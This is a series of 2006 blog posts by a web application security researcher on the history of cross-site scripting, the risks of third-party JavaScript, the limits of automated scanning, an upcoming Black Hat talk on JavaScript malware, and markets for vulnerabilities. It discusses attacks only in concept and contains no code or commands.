Sunday, July 30, 2006

The origins of Cross-Site Scripting (XSS)

I've been active within web application security world for many years now. Well before it was called "web application security", back when we called it "CGI security". Remember the name for a web application was originally CGI (common gateway interface). Anyway in the mid-90's, when I was still a teenager, the Web was just first starting to take off. These were the days of old Netscape, Yahoo, the blink tag, when every page was "under construction" with the same little yellow street sign. Before Microsoft even acknowledge the Internet. All the cool web pages used frames. One for the menu and another for the main content body, and some had a dozen of them because they could. Then JavaScript hit the scene and became all the rage.

JavaScript enabled web developers to do all sorts of crazy things like image rollovers, mouse followers, and pop-up windows. Sure it wasn't the slick AJAX stuff like today, but neat enough at the time. What was soon discovered was that a malicious website could load another website into an adjacent frame or window, then use JavaScript to read into it. One website could cross a boundry and script into another page. Pull data from forms, re-write the page, etc. Hence the name cross-site scripting (CSS). Notice the use of "CSS". Netscape fired back with the "same-origin policy", designed to prevent such behavior. And the browser hackers took this as a challenge and began finding what seems like hundreds of ways to circumvent the security.

As more became familiar with CSS, people confused the terms with Cascading Style Sheets. Another newly born web browser technology in the 90's. Then a couple of years ago, via the webappsec mailing list, someone made the suggestion of changing cross-site scripting to XSS to avoid confusion. And just like that it stuck. XSS had an identity and dozens of newly minted white papers and thousands of advisories were released. Over time the original meaning of XSS changed, from one of reading across domains to anytime you can get a website to display user-supplied content laced with HTML/JavaScript. Thats why so many people are still confused by the name cross-site scripting, because it really doesn't describe what its become.

Such is the nature of things.

In a few short days we're going into the next evolutionary step. Hacking intranets with JavaScript Malware.

JavaScript Malware Slashdotted

Posted here. Hopefully the WhiteHat web server will be able to handle the load.

Wednesday, July 26, 2006

Where the next BIG attacks will come from

This morning I caught a post on webkitchen describing an idea for implementing safe cross-domain XHR using an opt-in method (by the destination server). A neat idea that I'll have to give more thought to. Clearly web developers need this kind of functionality to create ever better web apps. What caught my attention was near the bottom of the post:

"Clientside cross-domain data requests are an extremely useful tool. They can only currently be done (in Javascript) using the script-tag workaround to deliver data as JSON.

External JSON is extremely dangerous as it is arbitrary third-party code executed in the scope of the current web-page. It can be used to steal passwords or data present in the current scope. "
The author has it right, calling in external JSON is extremely dangerous. However, this explanation doesn't go far enough. Anytime you call JavaScript includes onto your web page from a third-party it carries the same risk. After all it is possible for the data feed to contain JavaScript Malware which is capable of doing many nasty things to your visitors (including stealing passwords). Also included in the risk profile are JS traffic counters, advertising banners, rss feeds, weather display, clocks, etc etc. You know, web page widgets.

I eluded to this eventuality in my white paper on Cross-Site Scripting Worms and Viruses. In my opionion this is the likely attack vector for the next BIG attacks on the Web.

Tuesday, July 25, 2006

What WAS true, is no longer

Ryan Barnett brought something really interesting to my attention about Oreilly's JavaScript: The Definitive Guide as it relates to my Black Hat talk about JavaScript Malware. Remember my demos will not use any of what we would call "vulnerabilities" or "exploits" (No Bofos). Just the clever use of native JavaScript.

In 20.1, the following text:
"For example, client-side JavaScript does not provide any way to read, write, create, delete, or list files or directories on the client computer. Since there is no File object, and no file access functions, a JavaScript program obviously cannot delete a user's data, or plant viruses on the user's system, for example."
Without resorting to exploits, this remains more or less true, but has become a sort of red herring. Since much of our confidential information (CC's, tax/medical records, email, bank info, etc) is now on a website somewhere. What difference does it really make if you can't access files on my OS? The valuable data is on a public web server where JavaScript CAN access it.
"Similarly, client-side JavaScript has no networking primitives of any type. A JavaScript program can load URLs and send HTML form data to web servers and CGI scripts, but it cannot establish a direct connection to any other hosts on the network. "
WRONG. JavaScript can easily force a web browser to establish (HTTP/HTTPS) connections to any host the client can reach. Non (HTTP/HTTPS) connections are a bit trickier and browser dependent, but well within the realm of possibility. In fact without using JavaScript someone has already demonstrated a method to do just that. Mozilla/Firefox have today have certain protections again connections may to port 22 for instance, but that can be circumvented as well. That topic is for another time.
"This means, for example, that a JavaScript program cannot use a client's machine as a attack platform from which to attempt to crack passwords on other machines. (This would be a particularly dangerous possibility if the JavaScript program has been loaded from the Internet, through a firewall, and then could attempt to break into the intranet protected by the firewall.)"
Again, no longer true, if it ever was. Last year in my Phishing with Superbait talk I demonstrated how JavaScript Malware could completely control the web browser and be used as an attack platform. What new this year is I'll be demonstrated precisely how this can be done internally through the firewall.
"But other information should not be public. This includes your email address, for example, which should not be released unless you choose to do so by sending an email message or authorizing an automated email message to be sent under your name."
Sorta still true. If you use a non web based email address, then your email address is harder to get, but not exactly impossible to find. If you are using web-mail, like most of us, then your email address is accessible.
"Similarly, your browsing history (what sites you've already visited) and the contents of your bookmarks list should remain private. Because your browsing history and bookmarks say a lot about your interests, this is information that direct marketers and others would pay good money for, so that they can more effectively target sales pitches to you."
Your bookmarks are safe (without an exploit), your browsing history, not so much.
"We don't want a JavaScript program to be able to start examining data behind our corporate firewall or to upload our passwords file to its web server, for example."
What we want is one thing, what's possible is quite another.

Forging HTTP request headers with Flash

Amit Klein, a top webappsec expert, published "Forging HTTP request headers with Flash". Essentially Amit found a way using Flash to force a users browser to send HTTP requests to any location and alter the Referer header in the process. This discovery has wide-ranging implications for web application security, not the least of which impact the ability to do anti-CSRF using Referers. In an odd conicidence, I was working on a solution to do easy anti-CSRF using ModSecurity (Amit had prior knowledge of) based on using Referers. Was set to be released through WASC. I know what your thinking, "don't ever ever ever trust the client". But I felt there could be an exception in this case and had the proof to back it up. But Amit being the nice guy that he is let me know what he was working on ahead of time. So, the article I had planned is being moth balled. Every week is something new.

Anticipation growing leading up to Black Hat

Black Hat is almost upon us and the media engines are in gear. They're letting everyone know what the hot topics are for the conference. And there is A LOT this year. darkREADING just published an interview with yours truly, JavaScript Malware Targets Intranets, describing what I have in store for the audience. I can't wait! Without a doubt web application security is going to be a huge part of the show. Hat tip again to RSnake for all the help with the technical concepts and promotion of the event. Odd how some people have fun, "hey I wonder if we can port scan using JavaScript?". And here we are a couple months later.

Monday, July 24, 2006

Another way to force-spoof browser referers.

As a WhiteHat employee once said, "If JavaScript can't do it, ask daddy Flash". Amit Klein did a great job discovering and documenting a way to use Flash to force a user's browser to make arbitrary HTTP Requests to any location and spoof client-side headers (including Referer and Expect). This has many web application security implications which we'll need to discuss in the coming weeks.

"Forging HTTP request headers with Flash"

Bye Bye CSRF solution.

How is fuzzing like AI?

Hackers use AI to uncover vulnerabilities
"Researchers at Secure Computing said that cyber-criminals are exploiting the ability of AI tools to use a methodology referred to as 'fuzzing' to test applications for bugs."

Ok, I'm no Artificial Intelligence (AI) pro, but I believe I understand the fundamentals. I am however very familiar with software "fuzzing". Heck any competent black-box hacker is. You toss in some junk and if the output looks something like a vulnerability, then you have something to have a closer look at. Indeed there has been some cool research using fuzzing in the web browser space recently.

What I failed to understand is how fuzzing is anything like AI. Probably just the marketing teams spinning up new PR worthy headlines. Its not like it doesn't happen everyday anyway.

Tuesday, July 18, 2006

5 challenges of web application scanning

Web application security is a hot topic these days. And a comparably limited amount lot of research has been performed in a field which remains wide open for creative minds. All you need to do is pick a topic and you are sure to uncover new stuff.

The work we do at WhiteHat Security enables us to push the limits of automated web application vulnerability scanning. Its vital to understand precisely what can and can't be scanned for so an expert can compete the rest. Many still believe scanning web applications is anywhere close to the capabilities of our network scanning cousins. The difference in the comprehensiveness and methodology is night and day. While the validity of my estimates have been questioned by other webappsec scanner vendors, but my educated guess (based on thousands of assessments) remains that only about half of the required tests for a security assessment can be performed on a purely automated basis. The other half require human involvement, typically for identifying vulnerabilities in business logic.

This is the area where we focus on improving the most. We know its impossible to scan for everything (undecidable problems), so why not instead focus on the areas that reduce the human time necessary to complete a thorough assessment? To us this makes the most sense from a solution standpoint. We measure, on check-by-check basis, what tests are working or not. What's taking us the most time and what can we do to speed things up? This strategy affords us the unique and agile ability to improve our assessment process faster than anyone else. We bridge the gap between our operations team (the guys that do the work) and the development team (who make the technology). The results are more complete, repeatable, and inexpensive security assessments.

For the technologists, the bits of information about the challenges of automated web application scanning is what's interesting? I'll describe about a few.

False-Positives and Vulnerability Duplicates
Anyone who has ever run a vulnerability scanner of any type understands the problem of false-positives. They are huge waste of time. In the webappsec world, we have that plus the problem of vulnerability duplicates. Its often very difficult to tell if a 1,000 XSS scanner reported vulnerabilities are in fact the same issue. Vulnerable parameters may be shared across different CGI's. URL's may contain dynamic content. Results can be hard to collapse down effectively and if you can't, your lost in a pile script tags and single quotes.

404-Detection
Its common scanner practice to make guesses at files that might be left on the web server, just not linked in. Like login.cgi.bak, register.asp.old, or /admin/. You would think its the easiest thing in the world to tell if a file is there or not right!? Web servers are supposed to respond with code 404 (RFC) aren't they!? Sure they do, er, sometimes anyway. Sometimes there are web server handlers that respond with 200 OK no matter what, making you think something is there when it isn't. They might even give you content it thinks you want, but not what you asked for. How do you tell? Sometimes the web servers and servlets inside have different 404 handlers. Some 404, while others 200, making it difficult to identify what exactly the web server is configured to do when. Then dealing with dynamic not found page content and multiple stages of re-directs. The list of strangeness is endless. Unaccounted for strangeness causes false-positives.

Login and Authentication Detection
Again, another thing you would think should be simple. We made the same assumption in the early years ago and got a rude awakening. All you have to do is plug in a username and password, get a cookie, and scan away right? If only it were that simple. Web sites login-in using so many different methods. Some POST, some GET. Others rely on JavaScript (or broken JS), Java Applets, a specific web browser because it checks the DOM, multiple layers of cookies and redirects, virtual keyboards. The list and combinations is endless. And finding a way to support all these forms of technology is just half the story. The other one is trying to determine whether or not the scanner is still logged in. Any number of activities could cause the session to be invalided. The crawler hits the logout link, session timeouts, IDS systems purposely causing logout on attack detection. The big thing is if it the scanner cannot maintain login-state, the scans are invalid, end of story. Well almost, you get to deal with false-positives next.

Infinite web sites
We like to refer to this issue as the "calendar problem", as this was the spot we initially ran into it the most. By the way, we found the year 10,000 problem first, we think. :) When crawling web sites, sometimes there are just too many web pages (millions of items), grows and decays too rapidly, or unique links are generated on-the-fly. A good percentage of the time, while we can technically reach heights of million-plus link scans, its simply impossible or impractical to crawl the entire website. A scanner could trap itself by going down an infinite branch of a website. A scanner needs to be smart enough to realize its in this trap and dig itself out. Otherwise you get an infinite scan.

Finding all pages and functionality
This is a similar problem to the infinite web site issue. To test websites for vulnerabilities, you have to find as many of its applications and functional parts as possible. The problem is you can never be sure you found all the functionality or figure out all the ways to exercise its moving parts. In fact some functional URL's may never be linked into the main website and only exposed through email. Then there's always the possibility certain functionality is buried several form layers deep, accessible by only specific users, or hidden behind/inside JavaScript/Applets/Flash/ActiveX. Sometimes the only way to find this stuff is manually and even then your guessing you found it all.

So there you have it. An overview of a handful of the challenges we push the limits on everyday. I wish I could go into the innovative solutions we've develop and improve behind the scenes. The bottom line of what you need to know is scanning web application is an imperfect art. And if you take a list of "we support this" features from any scanner, you'll find the actual "support" will vary from one website to the next. That's why scanning in addition to an assessment process is the only way to go and greater than the sum of its parts.

the devil made me do it

I was just reading RSnake's post on Attacking Applications Via XSS Proxies. We've toyed around with different XSS exploitation ideas for a long while, but having seen it written out, its spooky. Essentially RSnake describes how someone could hack a website, using an XSS'ed victim, with the bonus that the attackers IP never shows up in the target machines logs. The explanation is a bit complicated, the XSS proxy attack diagram makes it easier, but once it clicks you'll see how plausible and easy the idea becomes.

Another side effect of the research applies to cyber crime (hacking) cases. I've read that court have found reasonable doubt for the accused where the arguement is a trojan-horse on their machine did the hacking. Not them. The forensic investigators certianly can't rule out the possibility, because hey, the machine did have a trojan and could have done exactly that. The thing is XSS malware is able act similarly to an typical trojan horse, the main difference is the code resides in the web browser, and not present on the filesystem or memory.

What if a person wanted to frame someone using an XSS attack? For instance making their victim hack another website (ala Rsnake), DoS some government websites, or access some pedophilia. Every log in the world would say the victim did exactly that and leaves very little if any forensic evidence. Trojan defense goes out the door, for the innocent and the guilty, especially since I doubt forensic investigators are looking for XSS malware to begin with.

Thursday, July 13, 2006

bug will always be with us

I came across this google blog post after my last entry. It describes how a bug in a binary search program, in Programming Pearls, escaped detection for twenty years! Check this out:
"And now we know the binary search is bug-free, right? Well, we strongly suspect so, but we don't know. It is not sufficient merely to prove a program correct; you have to test it too. Moreover, to be really certain that a program is correct, you have to test it for all possible input values, but this is seldom feasible. With concurrent programs, it's even worse: You have to test for all internal states, which is, for all practical purposes, impossible."
This is exactly the reason why we have so many problems comprehensively scanning complex web applications. Where the descrete software components exist on many different servers. The state is always changing. The code is always changing. Everything is always changing.

"Careful design is great. Testing is great. Formal methods are great. Code reviews are great. Static analysis is great. But none of these things alone are sufficient to eliminate bugs: They will always be with us. A bug can exist for half a century despite our best efforts to exterminate it."

This is another reason why I've been a heavy proponent (as a practitioner and a vendor) for pen-testing websites like a hacker would. Because a hacker only needs to find that 1 bug to ruin your day, you have to test even more thoroughly and intensely. The focus must be to find all vulnerabilties all the time, its the only way to make a difference.




Tuesday, July 11, 2006

Securing 88,166,395 sites

According to Netcraft's July 2006 Web Server Survey there are 88,166,395 sites, an increase of 2.87 million from the month of June. That’s an astounding 95,000 new sites per day! I’ve frequently discussed that roughly 8 in 10 websites have serious vulnerabilities. Talk about a hacker paradise. Scammers, phishers, carders, blackhats (not the conference), or lets just call them criminals know this well. They are reaping the rewards at our expense. With the help of disclosure laws, its no wonder everyday reports break about new website hacks. We know all this stuff already, but what we can do about it?

What are we going to do about the security nearly 90 million websites?

Some say, "security in the Software Development Life-Cycle (SDLC) will save us." A development process of creating solid code from the beginning. It has the benefit of producing quality code and that has less bugs. Less bugs = more secure. More secure = harder to hack. Harder to hack = good. No argument there. Though we have to be pragmatic. Planning to be bug-free and requiring developers to write 100% secure code is not a reasonable request. It doesn't mean they don't want to, its because its REALLY REALLY hard, maybe impossible. Furthermore, proving if code is bug-free (secure) is impossible. This is one of those undecidable halting problems.

Remember we’ve been dealing with Buffer Overflows for 20 years (maybe more) Will it be any different for Cross-Site Scripting? I don't think so. Lets face it, no matter how hard we try, software will always have bugs and therefore security vulnerabilities. To say nothing about the fact we'll NEVER go and recode all 88,166,395 websites. That’s just a plain silly assertion people make. What we really need to know is WHERE and HOW our existing websites are vulnerable. And also stay on top of the daily code updates. Then we can make intelligent decisions and measure our success.

Secure code is one thing we can do, another is implementing a strategy of defense-in-depth. One in which Web Application Firewalls (WAF's) are a part of. I routinely recommend ModSecurity for anyone using Apache (it’s on every one of my installs). WAF’s have the benefit of protecting web applications that may or may not be vulnerable to something. Sure, they are not perfect and have many negative side effects. Though when implemented properly they provide that extra protection that could very well keep you out of the headlines.

In any event, I’ll continue recommending web application security assessments, otherwise how do you know if your website is secure or not? It could be when some web hacker does it for you by alerting the media.

My Black Hat USA 2006 Presentation

Its been posted everywhere except here that I'll be presenting at this years Black Hat USA 2006. The show is only a few short weeks away and I'm really excited about it. The sheer volume of web application security talks is nothing short of amazing and I think I’ll just camp out in the Palace Ballroom 1 (Web Security Track) on Day 2.

Anyone who has ever responded to a Black Hat CFP knows how difficult it is to get in because you are literally competing with the top infosec experts in the world. This is why people attend Black Hat and what they expect to see. Even after nearly a dozen appearances, its still very much an honor to be accepted. My topic this year, Hacking Intranet Websites from the Outside - "JavaScript malware just got a lot more dangerous", will be particularly special and well beyond anything previously demonstrated in the past.

That’s right, JavaScript Malware.

When visiting a web page JavaScript Malware grabs your web browser’s cookies/history, discovers your internal NAT'ed IP address, port scans behind the firewall, and exploits intranet web-enable devices from the inside. Of course the PoC code also acts like a trojan horse by keystroke recording and tracking your every move. No browser exploits required. If this isn’t malware I don’t know what is. And if that weren't enough, I’ll be describing how websites that are vulnerable to Cross-Site Scripting (the most common vulnerability) can open them up to hosting and publishing JavaScript Malware to their visitors.

If you are at the show, WASC is having another meet-up:

“Whenever there are lots of webappsec presentations and people in the same place, it's a good opportunity for members of the community to meet-up. As we did last year, tucked in between the first day talks and before the vendor parties, we gather to share drinks, war stories, gossip, techno babble, and some laughs. With the amount web application security stuff going on at the conference, our 4th WASC meet-up should be the biggest ever!”

Time: Wed, August 2 @ 6:15pm

Place: Shadow bar at Caesars
http://www.caesars.com/Caesars/LasVegas/Dining/BarsLounges/ShadowBar.htm

recommended reading

Over the last year I've been fortunate enough to assist several authors with some brand-new and really good information security books. I was asked to write the foreword for two of them and also got nice quote on the cover of another. These books are stellar and if you’re looking to learn the latest tricks-of-the-trade, especially in web application security, these are definitely worth picking up.



Hacker's Challenge 3
by David Pollino, Bill Pennington, Tony Bradley, Himanshu Dwivedi



Hacking Exposed Web Applications, Second Edition
by Joel Scambray, Mike Shema, Caleb Sima



Preventing Web Attacks with Apache
by Ryan C. Barnett



Apache Security
by Ivan Ristic

Monday, July 10, 2006

buying and selling exploits

Rsnake's post on a Google's recent XSS woes spurred some interesting thoughts about the market value and marketplace for of 0-day vulnerabilities. The premise being that if a "good guy" discovers a vulnerability, they are expected by the vendor and the community, to disclose it responsibly so it may or may not be fixed. In return the good guy can expect some credit for their work. The issue is finding these vulnerabilities takes "work" and "expertise". Sure, some more than others. The good guy also runs the risk of angering people, which Rsnake encountered, making the process of disclosure something not worth repeating.

The important part to understand is certain vulnerabilities have significant value the black hat element. I'd expect the bad guys are finding and buying 0-days to be a lot more common than we'd like to believe. They have no problem monetizing the information by exploitation, extortion, or whatever else they can think of. So the question Rsnake raised about developing a marketplace for vulnerabilities (an auction) is something worth considering. A marketplace where the good guy and the vendor gets what they want and the user is better protected. Nice.

I knew I'd come across this line of thinking before so I had to do some research. Ironically using Google.

I did recall that Mozilla had a Bug Bounty program and LiveJournal had the XSS security challenge. These initiatives seemed to be at least somewhat successful. Also ironically I discovered that at the end of 2005, "eBay pulls vulnerability auction", that was offering up an MS Excel vulnerability, "which could allow a malicious programmer to create an Excel file that could take control of a Windows computer when opened." Saying that "the sale of flaw research violates the site's policy against encouraging illegal activity." Fair enough. Well-recognized bug-finder Greg Hoglund also toyed with the 0-day marketplace idea. "Turning to auctions to maximize a security researcher's profits and fairly value security research is also not a new idea. Two years ago, security expert Greg Hoglund had reserved the domain "zerobay.com" and intended to create an auction site, but worries over liability caused him to scuttle the plan a few days before the site went live, he said."

Picking up from there more recently, there have been a couple of companies including 3Com's TippingPoint that purchases vulnerabilities though their zero day initiative program. Though I'm not familiar with their current stance of live web application vulnerabilities. So developing a marketplace for vulnerabilities is not exactly unheard of, but I do think there is a gaping hole there when it comes to custom web applications.

As I've said on many occasions before, in webappsec the issue it NOT disclosure, it's discovery:

"Web application security" vulnerabilities are completely different issue because they exist on someone else's server. The infosec community hasn't dealt with the legal issues of "discovering" vulnerabilities, only with "disclosing" them. Researchers have played the role of good samaritan by finding vulnerabilities in software thats important. So far, the software has run on our PC's. However we're moving into a world where the important software is custom web applications and not installable elsewhere. The same people whom provided the layer of security checking can no longer do so in a safe legal fashion. To those who say "do not test a system without written consent", offer good but short-sighted advice. Organizations providing the web-based services are not going to be handing out "hack me if can" authorization letters.

Perhaps Google, Yahoo, Microsoft or some other big web service operator could openly compensate the people who find vulnerabilities in their custom web applications and save everyone including themselves some headache. If LiveJournal can do it, hey, maybe they can to.